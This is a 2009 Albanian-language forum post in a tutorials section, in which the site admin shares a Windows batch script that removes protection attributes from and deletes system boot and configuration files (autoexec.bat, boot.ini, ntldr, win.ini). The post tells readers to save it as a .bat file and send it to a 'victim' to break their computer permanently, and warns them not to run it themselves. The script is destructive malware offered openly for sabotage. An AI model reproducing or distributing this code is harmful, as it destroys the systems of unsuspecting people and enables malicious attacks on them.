..:: Mire se erdhte ne DrenicaZone.Ch ju deshirojm caste te kendshme::..
 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Fik pc pergjithmon

Shko poshtë 
AutoriMesazh
Jamee
Admin
avatar

Numri i postimeve : 200
Registration date : 22/01/2009

MesazhTitulli: Fik pc pergjithmon   Thu Feb 12, 2009 7:08 pm

Cito:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Hapeni notepad dhe bëjeni copy past codin që është i postuar më lart dhe ruajeni si fajll .bat dhe ja dergoni fiktimes të cilen dëshironi më ja prish pc-n përgjithmon.

PERKUJTOJ
Mos klikoni ju mbi atë fajll se ju shkon Pc-ja

Gjithashtu nëse fiktima ka VISTA atëhërë ky trik nuk funksionon.
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://drenicazone.getgoo.net
 
Fik pc pergjithmon
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: